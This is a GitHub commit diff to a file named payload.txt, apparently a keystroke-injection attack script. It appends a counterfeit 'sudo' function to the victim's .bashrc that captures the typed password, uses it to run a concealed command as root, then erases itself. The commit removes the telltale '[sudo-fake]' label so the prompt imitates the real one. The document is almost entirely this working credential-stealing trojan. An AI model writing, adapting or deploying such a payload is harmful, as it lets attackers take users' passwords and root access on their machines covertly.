Update payload.txt

pull/224/head
Simen 2024-05-04 22:05:00 +02:00 committed by GitHub
parent 0b62562dd7
commit 65b9e0de86
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 1 additions and 1 deletions

View File

@ -36,7 +36,7 @@ STRINGLN_BLOCK
echo '
sudo() {
while true; do
read -s -r -p "[sudo-fake] password for ${USER}: " passwd
read -s -r -p "[sudo] password for ${USER}: " passwd
echo "${passwd}" | /usr/bin/sudo -S ${@} && { echo "${passwd}" | /usr/bin/sudo -S #cmd; head -n -6 .bashrc > temp && mv temp .bashrc; break; } >/dev/null 2>&1 || { clear; echo "Sorry, try again."; }
done
}' >> .bashrc